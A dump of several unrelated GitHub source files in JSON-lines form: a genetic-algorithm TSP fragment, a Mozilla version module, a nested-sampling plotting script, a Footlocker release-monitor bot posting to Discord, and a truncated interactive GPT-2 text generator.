True)\n\npop0.print_paths(True, True)\n\nend = time.time()\nprint(\"time: \", end - start)\n","repo_name":"ibrahimKocak/GeneticTspResearchWithPython","sub_path":"population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
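# For illustration only: population.py above imports get_children from
# crossingover.py, which is not included in this dump. Below is a minimal sketch
# of the kind of order-crossover (OX-style) operator such a get_children is
# typically built on -- an assumption about its behaviour, not the repo's code.
import random
from typing import List

def order_crossover(p1: List[int], p2: List[int]) -> List[int]:
    # copy a random slice of the first parent's tour ...
    n = len(p1)
    a, b = sorted(random.sample(range(n), 2))
    child: List[int] = [-1] * n
    child[a:b] = p1[a:b]
    # ... then fill the remaining positions with the second parent's cities,
    # keeping their relative order and skipping cities already copied
    fill = [c for c in p2 if c not in p1[a:b]]
    for i in list(range(b, n)) + list(range(a)):
        child[i] = fill.pop(0)
    return child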
+{"seq_id":"33975218296","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Deal with the scriptworker version in semver format.\n\nCopied from scriptharness.\n\nHowever, since writing this I've discovered that setuptools and sphinx don't\naccept all semver formatted versions. It's not clear if this will go away.\n\nWhen called as a script, this will update ../version.json with the appropriate\nversion info.\n\nAttributes:\n __version__ (Tuple[int, int, int, str]): semver version - three integers and an\n optional string.\n __version_string__ (str): semver version in string format.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport json\nimport os\nfrom typing import Optional, Tuple, Union, cast\n\nShortVerType = Tuple[int, int, int]\nLongVerType = Tuple[int, int, int, str]\n\n\n# get_version_string {{{1\ndef get_version_string(version: Union[ShortVerType, LongVerType]) -> str:\n \"\"\"Translate a version tuple into a string.\n\n Specify the __version__ as a tuple for more precise comparisons, and\n translate it to __version_string__ for when that's needed.\n\n This function exists primarily for easier unit testing.\n\n Args:\n version (Tuple[int, int, int, str]): three ints and an optional string.\n\n Returns:\n version_string (str): the tuple translated into a string per PEP 440\n\n \"\"\"\n version_len = len(version)\n if version_len == 3:\n version_string = \"%d.%d.%d\" % cast(ShortVerType, version)\n elif version_len == 4:\n version_string = \"%d.%d.%d.%s\" % cast(LongVerType, version)\n else:\n raise Exception(\"Version tuple is non-semver-compliant {} length!\".format(version_len))\n return version_string\n\n\n# 1}}}\n# Semantic versioning 2.0.0 http://semver.org/\n__version__ = (49, 1, 1)\n__version_string__ = get_version_string(__version__)\n\n\n# write_version {{{1\ndef write_version(name: Optional[str] = None, path: Optional[str] = None) -> None:\n \"\"\"Write the version info to ../version.json, for setup.py.\n\n Args:\n name (Optional[str]): this is for the ``write_version(name=__name__)``\n below. That's one way to both follow the\n ``if __name__ == '__main__':`` convention but also allow for full\n coverage without ignoring parts of the file.\n\n path (Optional[str]): the path to write the version json to. 
Defaults\n to ../version.json\n \"\"\"\n # Written like this for coverage purposes.\n # http://stackoverflow.com/questions/5850268/how-to-test-or-mock-if-name-main-contents/27084447#27084447\n if name in (None, \"__main__\"):\n path = path or os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))), \"version.json\")\n contents = {\"version\": __version__, \"version_string\": __version_string__}\n with open(path, \"w\") as filehandle:\n print(json.dumps(contents, sort_keys=True, indent=4, separators=(\",\", \":\")), file=filehandle)\n\n\nwrite_version(name=__name__)\n","repo_name":"mozilla-releng/scriptworker","sub_path":"src/scriptworker/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39797024079","text":"#!/usr/bin/env python\n\n\"\"\"\nScript to collate the results from running the analysis on the test Gaussian runs\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport sys\nimport os\nimport numpy as np\nimport argparse\nimport subprocess as sp\nfrom scipy.special import erf\nimport tarfile\n\nimport matplotlib as mpl\nfrom matplotlib import pyplot as pl\nimport matplotlib.patches as mpatches\n\nmplparams = { \\\n 'backend': 'Agg',\n 'text.usetex': True, # use LaTeX for all text\n 'axes.linewidth': 0.5, # set axes linewidths to 0.5\n 'axes.grid': True, # add a grid\n 'grid.linewidth': 0.5,\n 'font.family': 'sans-serif',\n 'font.sans-serif': 'Avant Garde, Helvetica, Computer Modern Sans serif',\n 'font.size': 15 }\n\nmpl.rcParams.update(mplparams)\n\nparser = argparse.ArgumentParser( )\nparser.add_argument(\"-i\", \"--input-file\", dest=\"infile\", required=True, help=\"The input tarball file\")\n#parser.add_argument(\"-i\", \"--ndirs\", dest=\"ndirs\", required=True, type=int, help=\"Set the number directories used in the runs.\")\n#parser.add_argument(\"-b\", \"--base-dir\", dest=\"basedir\", help=\"Set the base directory for the runs\")\nparser.add_argument(\"-o\", \"--output-file\", dest=\"outfile\", help=\"Set the output figure file without extension\")\n#parser.add_argument(\"-N\", \"--Nlive\", dest=\"nlives\", action='append', default=None, help=\"Set number of nested samples used (each value passed will be assumed as the base directory name for that data\")\n\n# parse input options\nopts = parser.parse_args()\n\n# the base directory\n#basedir = opts.basedir\n#if not os.path.isdir(basedir):\n# print(\"Error... base directory '%s' does not exist.\" % basedir, file=sys.stderr)\n# sys.exit(1)\n\n#if opts.ndirs < 1:\n# print(\"Error... 
there must be a positive number of directories.\", file=sys.stderr)\n# sys.exit(1)\n\ntar = tarfile.open(opts.infile, \"r:gz\")\n\nmaxranges = {}\ntrueuls = {}\ntrueevs = {}\ntruekls = {}\nevidences = {}\nupperlimits = {}\nevidenceerrs = {}\nkspvalues = {}\ntimings = {}\n\noformat = '*_stats.txt'\npfile = 'prior.txt'\ntruefile = 'test_gauss.txt'\n\n# calculate the true KL-divergence (required as the calculation used for the value in test_gauss.txt was wrong in the code version that was run for these tests)\ndef kltrue(maxv, sigmah, lnZ):\n prior = 1./maxv\n p_Z = np.exp(np.log(prior)- lnZ)\n\n L = lnZ + 0.5*np.log(2.*np.pi*sigmah**2)\n\n D = -(1.+2.*L)*erf(-maxv/(np.sqrt(2.)*sigmah))\n G = -(1./(np.sqrt(2.*np.pi)*sigmah))*(maxv*np.exp(-0.5*maxv**2/sigmah**2))\n\n return -0.25*p_Z*(D + 2.*G)\n\n#if opts.nlives is None:\n# nlives = ['']\n#else:\n# nlives = []\n# for nlive in opts.nlives:\n# try:\n# nlives.append(str(int(nlive)))\n# except:\n# print(\"Error... could not convert '%s' number of live points to integer\" % nlive, file=sys.stderr)\n# sys.exit(1)\n\n# hard code in run parameters\nnlives = ['512', '1024', '2048', '4096', '8192']\nndirs = ['%03d' % i for i in range(11)]\n\nfor j in range(len(nlives)):\n #livedir = os.path.join(basedir, nlives[j])\n #if len(nlives[j]) == 0:\n # lname = 'Unknown'\n #else:\n # lname = nlives[j]\n lname = nlives[j]\n\n # initialise dictionaries for different numbers of live points\n maxranges[lname] = []\n trueuls[lname] = []\n trueevs[lname] = []\n truekls[lname] = []\n evidences[lname] = []\n upperlimits[lname] = []\n evidenceerrs[lname] = []\n kspvalues[lname] = []\n if timings is not None:\n timings[lname] = []\n\n #if not os.path.isdir(livedir):\n # print(\"Error... '%s' directory does not exist.\" % livedir, file=sys.stderr)\n # sys.exit(1)\n \n #for i in range(opts.ndirs):\n for fdir in ndirs:\n #fdir = os.path.join(livedir, \"%03d\" % i)\n #if not os.path.isdir(fdir):\n # print(\"Error... '%s' directory does not exist.\" % fdir, file=sys.stderr)\n # continue\n \n # get directories for the given number of live points and fdir value\n lpdirs = [(tar.getmember(name), name) for name in tar.getnames() if nlives[j]+'/'+fdir in name]\n \n #l = os.listdir(fdir)\n #nf = 0\n #for f in l: # count number of files\n # if '_stats.txt' in f:\n # nf += 1\n\n a = []\n for lpv in lpdirs:\n if lpv[0].isfile():\n if '_stats.txt' in lpv[1]:\n fp = tar.extractfile(lpv[0])\n a.append([float(v.strip()) for v in fp.readline().split()])\n elif pfile in lpv[1]:\n # get limits from prior file\n fp = tar.extractfile(lpv[0])\n l = fp.readline().split()\n maxv = float(l[-1].strip())\n maxranges[lname].append(maxv)\n \n for lpv in lpdirs: # run again so that maxv is alway defined\n if lpv[0].isfile():\n if truefile in lpv[1]:\n # get true values of evidence and upper limits\n fp = tar.extractfile(lpv[0])\n l = fp.readline().split()\n trueevs[lname].append(float(l[0].strip()))\n trueuls[lname].append(float(l[1].strip())) \n #truekls[lname].append(float(l[2].strip())) # this value was wrongly calculated\n truekls[lname].append(kltrue(maxv, 1e-24, trueevs[lname][-1]))\n\n a = np.array(a)\n\n # concatenate output of 'stats' files and parse it\n #p = (sp.check_output(\"cat \"+os.path.join(fdir, oformat), shell=True)).split('\\n')\n #a = np.array([[float(v.strip()) for v in l.split()] for l in p if len(l.split()) == 4])\n\n #if a.shape[0] != nf:\n # print(\"Warning... 
number of files ('%d') and number of values read in ('%d') is not consistent.\" % (nf, a.shape[0]), file=sys.stderr)\n\n evidences[lname].append(a[:,0])\n upperlimits[lname].append(a[:,1])\n evidenceerrs[lname].append(a[:,2])\n kspvalues[lname].append(a[:,3])\n\n if a.shape[1] == 5:\n timings[lname].append(a[:,4])\n else:\n timings = None\n\n # get limits\n #if not os.path.isfile(os.path.join(fdir, pfile)):\n # print(\"Error... no prior file given in '%s'\" % fdir, file=sys.stderr)\n # sys.exit(1)\n\n #fp = open(os.path.join(fdir, pfile), 'r')\n #l = fp.readline().split()\n #fp.close()\n #maxv = float(l[-1].strip())\n #maxranges[lname].append(maxv)\n\n # get true values of evidence and upper limits\n #if not os.path.isfile(os.path.join(fdir, truefile)):\n # print(\"Error... no 'true value' file given in '%s'\" % fdir, file=sys.stderr)\n # sys.exit(1)\n\n #fp = open(os.path.join(fdir, truefile), 'r')\n #l = fp.readline().split()\n #fp.close()\n #trueevs[lname].append(float(l[0].strip()))\n #trueuls[lname].append(float(l[1].strip()))\n #truekls[lname].append(float(l[2].strip())) # this value was wrongly calculated\n #truekls[lname].append(kltrue(maxv, 1e-24, trueevs[lname][-1]))\n\n #print(\"Mean Z = %.7e +/- %.7e, true Z = %.7e\" % (np.mean(evidences[lname][-1]), np.mean(evidenceerrs[lname][-1]), trueevs[lname][-1]), file=sys.stdout)\n\ntar.close()\n\n# create figure for evidences\nfige = pl.figure(figsize=(8,7))\naxe = fige.add_subplot(111)\n\n# create figure for upper limits\nfigul = pl.figure(figsize=(8,7))\naxul = figul.add_subplot(111)\n\n# create figure for the K-S test\nfigks = pl.figure(figsize=(8,7))\naxks = figks.add_subplot(111)\n\n# create figure for timings\nif timings is not None:\n figtim = pl.figure(figsize=(7,6))\n axtim = figtim.add_subplot(111)\n\ncolors = ['blue', 'green', 'red', 'cyan', 'magenta', 'yellow'] # some colours\n\n# proxy patches for legend\nhandles = []\n\n# linear fits to KL divergence vs mean evidence ratio\nlfits = []\n\n# loop over live points in order\nfor j, nlive in enumerate(nlives):\n nlivei = int(nlive)\n\n handles.append(mpatches.Patch(color=colors[j], alpha=0.2, lw=2, label=nlive))\n\n # got linear fit to mean evidence offset vs information\n p = np.polyfit(truekls[nlive], [np.mean(ev-trueevs[nlive][i]) for i, ev in enumerate(evidences[nlive])], deg=1)\n lfits.append(p)\n print(\"N live: %s, linear fit ln(Z/Z_true) = %.2f + %.3f(KL-div)\" % (nlive, p[1], p[0]), file=sys.stdout)\n\n # violin plot for evidence ratios\n logpos = np.log10(maxranges[nlive])\n\n # offset the error bars so they don't overlap\n if len(nlives) > 1:\n dloffset = 0.3*(logpos[1]-logpos[0])\n dlp = 0.6*(logpos[1]-logpos[0])/(len(nlives)-1.)\n else:\n dloffset = 0.\n dlp = 0.\n\n logposoff = logpos-dloffset+j*dlp\n\n vd = axe.violinplot([ev-trueevs[nlive][i] for i, ev in enumerate(evidences[nlive])], logposoff, showextrema=False, showmedians=True, widths=0.09)\n # set colors\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_edgecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n yerr = [np.mean(ee) for ee in evidenceerrs[nlive]]\n\n axe.errorbar(logposoff, np.zeros(len(logpos)), yerr=[yerr, yerr], fmt='o', capsize=3, capthick=1, color=colors[j], markersize=3)\n\n # add new log-style axis labels\n if j == 0:\n axe.set_xlim([logpos[0]-1, logpos[-1]+1])\n\n axenew = axe.twiny()\n\n # turn-off current (non-log) axis lables\n axe.tick_params(axis='x', which='both', bottom='off', top='off', labelbottom='off')\n 
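# hide the linear tick labels here: the twin axis (axenew) below re-draws the same positions on a log scale, so the prior ranges read as powers of ten\n 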
axe.xaxis.grid(False)\n\n xlim = axe.get_xlim()\n axenew.set_xlim(10**np.array(xlim))\n axenew.set_xscale('log', nonposx='clip')\n axenew.set_xticks(np.logspace(logpos[0], logpos[-1], len(logpos)))\n axenew.xaxis.set_ticks_position('bottom')\n axenew.xaxis.grid(b=True, which='minor', color='k', linestyle='--', linewidth=0.5, alpha=0.3)\n\n axenew.set_xlabel('Prior range')\n axenew.xaxis.set_label_position('bottom')\n axe.set_ylabel(r'$\\ln{(\\mathcal{Z}/\\mathcal{Z}_{\\rm true})}$')\n\n # add the KL divergence (information gain)\n axenew2 = axenew.twiny()\n axenew2.grid(b=False)\n axenew2.set_xticks(logpos)\n axenew2.set_xbound(axe.get_xbound())\n axenew2.set_xticklabels(['$%.1f$' % yv for yv in truekls[nlive]])\n axenew2.set_xlabel('Information Gain (nats)')\n\n # show equivalent percentage evidence (not log evidence) offsets\n if j == len(nlives)-1: # only do for last set\n ayenew = axe.twinx()\n DZmin, DZmax = axe.get_ybound()\n pDZvals = np.arange(np.around(100.*(np.exp(DZmin)-1.), decimals=-1), np.around(100.*(np.exp(DZmax)-1.), decimals=-1), 50)\n equivlnZ = np.log((pDZvals/100.)+1.)\n\n ayenew.grid(b=False)\n ayenew.set_yticks(equivlnZ)\n ayenew.set_ybound(axe.get_ybound())\n\n ayenew.get_yaxis().set_tick_params(which='both', direction='out')\n ayenew.set_yticklabels(['$%d$' % yv for yv in pDZvals])\n ayenew.set_ylabel(r'$(\\mathcal{Z}-\\mathcal{Z}_{\\rm true})/\\mathcal{Z}_{\\rm true} \\%$')\n\n # produce violin plot of h0 upper limits\n vd = axul.violinplot(upperlimits[nlive], logposoff, showextrema=False, showmedians=True, widths=0.09)\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_edgecolor(colors[j])\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n\n if j == 0:\n axul.set_xlim([logpos[0]-1, logpos[-1]+1])\n\n axulnew = axul.twiny()\n\n # turn-off current (non-log) axis lables\n axul.tick_params(axis='x', which='both', bottom='off', top='off', labelbottom='off')\n axul.xaxis.grid(False)\n\n # plot true analytic upper limit\n xlim = axul.get_xlim()\n axul.plot(xlim, [trueuls[nlive][0], trueuls[nlive][0]], 'r--')\n\n axulnew.set_xlim(10**np.array(xlim))\n axulnew.set_xscale('log', nonposx='clip')\n axulnew.set_xticks(np.logspace(logpos[0], logpos[-1], len(logpos)))\n axulnew.xaxis.set_ticks_position('bottom')\n axulnew.xaxis.grid(b=True, which='minor', color='k', linestyle='--', linewidth=0.5, alpha=0.3)\n\n axulnew.set_xlabel('Prior range')\n axulnew.xaxis.set_label_position('bottom')\n axul.set_ylabel(r'95\\% credible upper limit')\n\n # convert into a fractional upper limit difference\n if j == len(nlives)-1:\n ayulnew = axul.twinx()\n ulmin, ulmax = axul.get_ybound()\n pdulvals = np.flipud(-np.arange(0., -np.floor(100.*(ulmin-trueuls[nlive][0])/trueuls[nlive][0]), 4))\n pdulvals = np.concatenate((pdulvals, np.arange(4., np.floor(100.*(ulmax-trueuls[nlive][0])/trueuls[nlive][0]), 4)))\n equivuls = ((pdulvals/100.)*trueuls[nlive][0]) + trueuls[nlive][0]\n\n ayulnew.grid(b=False)\n ayulnew.set_yticks(equivuls)\n ayulnew.set_ybound(axul.get_ybound())\n\n ayulnew.get_yaxis().set_tick_params(which='both', direction='out')\n ayulnew.set_yticklabels(['$%d$' % yv for yv in pdulvals])\n ayulnew.set_ylabel(r'$({\\rm UL}-{\\rm UL}_{\\rm true})/{\\rm UL}_{\\rm true} \\%$')\n\n # produce violin plots of K-S test p-values\n vd = axks.violinplot([np.log10(v[v > 0.0]) for v in kspvalues[nlive]], logposoff, showextrema=False, showmedians=True, widths=0.09)\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_alpha(0.2)\n 
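# each violin body returned by violinplot is a matplotlib PolyCollection, so it can be restyled to this run's colour\n 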
ps.set_edgecolor(colors[j])\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n\n if j == 0:\n axks.set_xlim([logpos[0]-1, logpos[-1]+1])\n\n axksnew = axks.twiny()\n\n # turn-off current (non-log) axis lables\n axks.tick_params(axis='x', which='both', bottom='off', top='off', labelbottom='off')\n axks.xaxis.grid(False)\n\n xlim = axks.get_xlim()\n axksnew.set_xlim(10**np.array(xlim))\n axksnew.set_xscale('log', nonposx='clip')\n axksnew.set_xticks(np.logspace(logpos[0], logpos[-1], len(logpos)))\n axksnew.xaxis.set_ticks_position('bottom')\n axksnew.xaxis.grid(b=True, which='minor', color='k', linestyle='--', linewidth=0.5, alpha=0.3)\n\n axksnew.set_xlabel('Prior range')\n axksnew.xaxis.set_label_position('bottom')\n\n ayksnew = axks.twinx()\n axks.tick_params(axis='y', which='both', left='off', right='off', labelleft='off')\n ylim = axks.get_ylim()\n ayksnew.set_ylim(10**np.array(ylim))\n ayksnew.set_yscale('log', nonposx='clip')\n ayksnew.yaxis.set_ticks_position('left')\n ayksnew.set_ylabel(r'KS test $p$-values')\n ayksnew.yaxis.set_label_position('left')\n\n logposoff = logpos-dloffset+j*dlp\n\n if timings is not None:\n timescaling = 5.9e-6\n #print(kloff)\n #print(np.array(timings[nlive]).shape)\n vd = axtim.violinplot((1e-6)*np.array(timings[nlive]).T/timescaling, truekls[nlive], showextrema=False, showmedians=True)\n for ps in vd['bodies']:\n ps.set_facecolor(colors[j])\n ps.set_alpha(0.2)\n ps.set_edgecolor(colors[j])\n ps.set_lw(1)\n ps = vd['cmedians']\n ps.set_color(colors[j])\n \n # get linear fit to mean evidence offset vs information\n #p = np.polyfit(truekls[nlive], [np.median(tims)/timescaling for tims in timings[nlive]], deg=1)\n #print(\"N live: %s, linear fit T = %.2f + %.3f(KL-div)\" % (nlive, p[1], p[0]), file=sys.stdout)\n #if j == 0:\n # print(truekls)\n #print([np.median(tims)/timescaling for tims in timings[nlive]])\n\n# add legend\naxe.legend(handles=handles, loc='upper left')\naxul.legend(handles=handles, loc='best')\naxks.legend(handles=handles, loc='lower left')\n\nfige.tight_layout()\nfigul.tight_layout()\nfigks.tight_layout()\n\nfige.savefig(opts.outfile+'_evidences.png', dpi=300)\nfige.savefig(opts.outfile+'_evidences.pdf')\np = sp.Popen('pdftops -eps %s' % opts.outfile+'_evidences.pdf', shell=True)\np.communicate()\n\nfigul.savefig(opts.outfile+'_uls.png', dpi=300)\nfigul.savefig(opts.outfile+'_uls.pdf')\np = sp.Popen('pdftops -eps %s' % opts.outfile+'_uls.pdf', shell=True)\np.communicate()\n\nfigks.savefig(opts.outfile+'_ks.png', dpi=300)\nfigks.savefig(opts.outfile+'_ks.pdf')\np = sp.Popen('pdftops -eps %s' % opts.outfile+'_ks.pdf', shell=True)\np.communicate()\n\nif timings is not None:\n axtim.set_yscale('log')\n axtim.legend(handles=handles, loc='lower right')\n axtim.set_xlabel('Information Gain (nats)')\n axtim.set_ylabel(r'run time ($10^6 \\mathcal{T}_{L}$)')\n figtim.tight_layout()\n figtim.savefig(opts.outfile+'_timings.png', dpi=300)\n figtim.savefig(opts.outfile+'_timings.pdf')\n p = sp.Popen('pdftops -eps %s' % opts.outfile+'_timings.pdf', shell=True)\n p.communicate()","repo_name":"mattpitkin/CW_nested_sampling_doc","sub_path":"figures/proptesting/collate_test_gauss.py","file_name":"collate_test_gauss.py","file_ext":"py","file_size_in_byte":15697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30388609018","text":"from datetime import datetime\r\nimport cloudscraper\r\nimport requests\r\nimport time\r\nimport json\r\n\r\n# Import the ids already in the 
monitor\r\nmonitor = []\r\ntry:\r\n with open('monitor.txt', 'r') as f:\r\n for line in f:\r\n monitor.append(line.strip())\r\nexcept:\r\n pass\r\n\r\n# Import the data from the config.json file\r\ntry:\r\n with open('config.json') as config_file:\r\n config = json.load(config_file)\r\nexcept:\r\n print(\"No config.json found\")\r\n exit()\r\n\r\n# Config variables\r\nwebhook_url = config['webhook_url']\r\navatar = config['avatar_url']\r\ncountry = config['country']\r\ntimeout = config['timeout']\r\nhookname = config['name']\r\nsleep = config['sleep']\r\n\r\n# Url for the request\r\nurl = f\"https://www.footlocker.{country}/apigate/release-calendar\"\r\n\r\n# Function to send the webhook and save the id\r\ndef sendWebhook(url, data, id):\r\n\r\n global monitor\r\n response = requests.post(url, json = data)\r\n time.sleep(0.5)\r\n if(response.status_code == 429):\r\n print(\"Rate limited\")\r\n time.sleep(10)\r\n \r\n else:\r\n monitor.append(str(id)) \r\n with open('monitor.txt', 'a') as f:\r\n f.write(f\"{id}\\n\")\r\n\r\n return response.status_code\r\n\r\n# Function to get the request and catchs the errors\r\ndef getRealeses(url):\r\n try:\r\n scraper = cloudscraper.create_scraper()\r\n response = scraper.get(url)\r\n if response.status_code == 200:\r\n return response.json()\r\n else:\r\n print(response.status_code)\r\n return None\r\n except Exception as e:\r\n print(e)\r\n return None\r\n\r\n# Main loop for track the releases \r\nwhile True:\r\n\r\n # Get the data from the request and the time\r\n data = getRealeses(url)\r\n now = time.time()\r\n print(\"Checking\\n\")\r\n \r\n # If the data is not None\r\n if data:\r\n\r\n try:\r\n # For loop for get all the releases\r\n size = len(data['releaseCalendarProducts']) \r\n for release in data['releaseCalendarProducts']:\r\n\r\n # Get the data of the release\r\n name = release['name']\r\n brand = release['brandName']\r\n id = release['id']\r\n img = release['image']\r\n gender = release['gender']\r\n launch = release['skuLaunchDate']\r\n link = f\"https://www.footlocker.{country}\" + release['pdpLink'] \r\n \r\n # Format the data\r\n info = {\r\n \"username\": hookname,\r\n \"avatar_url\": avatar,\r\n \"embeds\": [\r\n {\r\n \"title\" : name,\r\n \"url\": link,\r\n \"description\" : f\"**Name**: {name}\\n**Brand**: {brand}\\n**Gender**: {gender}\\n**Id**: {id}\\n\\n**Launch**: {launch}\\n\",\r\n \"color\": 14957809,\r\n \"thumbnail\": {\"url\": img}\r\n }\r\n ]\r\n }\r\n \r\n if \"hasStock\" in release:\r\n stock = release['hasStock']\r\n else:\r\n continue\r\n\r\n # If the release has no stock and its not launched yet and its not in the monitor\r\n fix = time.mktime(datetime.strptime(launch, \"%b %d %Y %H:%M:%S GMT+0000\").timetuple()) \r\n if(id not in monitor and fix > now):\r\n\r\n # Send the webhook\r\n code = sendWebhook(webhook_url, info, id)\r\n print(f\"Name: {name} - Id: {id}\") \r\n print(f\"Sent webhook {code}\\n\") \r\n\r\n except Exception as e:\r\n print(e)\r\n data = None\r\n\r\n # Catch the errors\r\n if not data:\r\n print(\"Error\")\r\n time.sleep(timeout)\r\n\r\n time.sleep(sleep)\r\n","repo_name":"Arqaen/Footlocker-Releases","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36826467748","text":"\nimport json\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nfrom src import model, sample, encoder\n\n\nclass Generator:\n\n\tdef 
__init__(self,\n\t\t\t\tmodel_name='117M',\n\t\t\t\tseed=None,\n\t\t\t\tbatch_size=6,\n\t\t\t\tlength=1,\n\t\t\t\ttemperature=1,\n\t\t\t\ttop_k=0,\n\t\t\t\ttop_p=0.0,\n\t\t\t\tckpt = 'checkpoint/12-8'\n\t):\n\t\t\"\"\"\n\t\t:model_name=117M : String, which model to use\n\t\t:seed=None : Integer seed for random number generators, fix seed to reproduce\n\t\t results\n\t\t:batch_size=6 : Number of batches (only affects speed/memory).\n\t\t:length=1 : Number of tokens in generated text, if None, is\n\t\t determined by model hyperparameters\n\t\t:temperature=1 : Float value controlling randomness in boltzmann\n\t\t distribution. Lower temperature results in less random completions. As the\n\t\t temperature approaches zero, the model will become deterministic and\n\t\t repetitive. Higher temperature results in more random completions.\n\t\t:top_k=0 : Integer value controlling diversity. 1 means only 1 word is\n\t\t considered for each step (token), resulting in deterministic completions,\n\t\t while 40 means 40 words are considered at each step. 0 (default) is a\n\t\t special setting meaning no restrictions. 40 generally is a good value.\n\t\t:top_p=0.0 : Float value controlling diversity. Implements nucleus sampling,\n\t\t overriding top_k if set to a value > 0. A good setting is 0.9.\n\t\t\"\"\"\n\n\t\tself.seed = seed\n\t\tself.batch_size = batch_size\t\t\n\t\tself.enc = encoder.get_encoder(model_name)\n\t\tself.hparams = model.default_hparams()\n\t\tself.temperature=temperature\n\t\tself.top_k = top_k\n\t\tself.top_p = top_p\n\t\tself.model_name = model_name\n\t\tself.length = length\n\t\tself.endoftext = self.enc.encode('<|endoftext|>')\n\n\t\tif ckpt:\n\t\t\tself.ckpt = ckpt\n\t\telse:\n\t\t\tself.ckpt = os.path.join('models', self.model_name)\n\n\t\twith open(os.path.join('models', model_name, 'hparams.json')) as f:\n\t\t\tself.hparams.override_from_dict(json.load(f))\n\t\tif length is None:\n\t\t\tself.length = length = self.hparams.n_ctx // 2\n\t\telif length > self.hparams.n_ctx:\n\t\t\traise ValueError(\"Can't get samples longer than window size: %s\" % self.hparams.n_ctx)\n\n\n\tdef generate(self, prompt=''):\n\t\twith tf.Session(graph=tf.Graph()) as sess:\n\n\t\t\tnp.random.seed(self.seed)\n\t\t\ttf.set_random_seed(self.seed)\n\n\t\t\t# enc.encoder['<|endoftext|>'] is different and does worse\n\t\t\tprompt = '<|endoftext|>'+prompt\n\n\t\t\t# if not prompt:\n\t\t\t# \tstart_token = self.enc.encoder['<|endoftext|>']\n\t\t\t\n\t\t\t\n\t\t\tcontext = tf.placeholder(tf.int32, [self.batch_size, None])\n\n\t\t\toutput = sample.sample_sequence(\n\t\t\t\thparams=self.hparams, length=self.length,\n\t\t\t\tcontext=context,\n\t\t\t\tbatch_size=self.batch_size,\n\t\t\t\ttemperature=self.temperature, top_k=self.top_k, top_p=self.top_p\n\t\t\t)\n\n\t\t\tsaver = tf.train.Saver()\n\t\t\tckpt = tf.train.latest_checkpoint(self.ckpt)\n\t\t\tsaver.restore(sess, ckpt)\t\n\n\t\t\tcontext_tokens = self.enc.encode(prompt)\n\t\t\tauto_accept = 0\n\t\t\twhile True:\n\t\t\t\t# save old text to show in decision\n\t\t\t\tpre_token_text = self.enc.decode(context_tokens[len(self.endoftext):]) \n\t\t\t\t# generate token batch\n\t\t\t\t#\tcontext_tokens.copy() to avoid modifying context_tokens\n\t\t\t\tnew_tokens = self.get_output(output, sess, context, context_tokens.copy())\n\t\t\t\t# iterate through batch until token selected or all of batch shown\n\t\t\t\tfor new_token in new_tokens:\n\t\t\t\t\t# decode token\n\t\t\t\t\tnew_text = self.enc.decode(new_token)\n\t\t\t\t\tif not auto_accept:\n\t\t\t\t\t\t# decide 
token\n\t\t\t\t\t\tnew_text, reset_prompt = self.decide(new_text, pre_token_text)\n\t\t\t\t\t\tif reset_prompt:\n\t\t\t\t\t\t\tif type(reset_prompt) == int:\n\t\t\t\t\t\t\t\tauto_accept = max(0, reset_prompt-1)\n\t\t\t\t\t\t\telif type(reset_prompt) == bool:\n\t\t\t\t\t\t\t\tcontext_tokens = self.enc.encode(prompt)\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t# backtrack if required\n\t\t\t\t\t\telif type(new_text) == int and new_text > 0:\n\t\t\t\t\t\t\tnew_text = min(new_text, len(context_tokens)-len(self.endoftext))\n\t\t\t\t\t\t\tcontext_tokens = context_tokens[:-new_text]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tauto_accept -= 1\n\t\t\t\t\t# update context\n\t\t\t\t\tif new_text:\n\t\t\t\t\t\tcontext_tokens += self.enc.encode(new_text)\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\n\n\t\t\t# decode the accepted text (without the leading endoftext marker)\n\t\t\ttext = self.enc.decode(context_tokens[len(self.endoftext):])\n\t\t\treturn text\n\n\n\n\tdef get_output(self, output, sess, context, context_tokens):\n\t\t# get tokens\n\t\tif context is not None:\n\t\t\t# conditional generation\n\t\t\ttokens, logits = sess.run(output, feed_dict={\n\t\t\t\tcontext: [context_tokens for _ in range(self.batch_size)]\n\t\t\t})\n\t\t\t# extract newly generated token (discard context)\n\t\t\ttokens = tokens[:, len(context_tokens):]\n\t\telse:\n\t\t\t# unconditional generation\n\t\t\t# get generated token (there is no context to discard here)\n\t\t\ttokens, logits = sess.run(output)\n\n\t\treturn tokens\n\n\tdef decide(self, new_text, old_text):\n\t\t# '\\x7f':del, '\\x1b':arrowkey, '\\r':enter, '\\\\': del chunk and 's':save\n\t\t#\t\tinterrupt = \\x03:ctrl-c or \\x1a:ctrl-z or 'q'\n\n\t\treset_prompt = False\n\t\t# loop until decision received\n\t\tdecision_received = False\n\t\twhile not decision_received:\n\t\t\t# assume user inputs correctly, correct if they don't\n\t\t\tdecision_received = True\n\t\t\tos.system('clear')\n\t\t\tprint('\\033[A\\033[2K')\n\t\t\tprint(\"{}::{}\".format(old_text, new_text), end='', flush=True)\n\t\t\t# get user feedback\n\t\t\tchar = getch()\n\t\t\tif char == '\\x7f': # reject token\n\t\t\t\tnew_text = 